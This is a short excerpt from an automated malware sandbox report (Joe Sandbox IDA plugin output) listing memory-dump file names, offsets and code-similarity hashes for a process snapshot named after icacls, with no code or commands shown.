                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                                                                                        • Instruction ID: ae28a33430ee5d3f9a6364e16834cf1b458f9baabb068ca697314bedc7cc78bd
                                                                                                        • Opcode Fuzzy Hash: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                                                                                        • Instruction Fuzzy Hash: C3813975D002699BDB31DB94CC44BEEB7B8AB49750F0445EAEA19F7280D7749E80CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%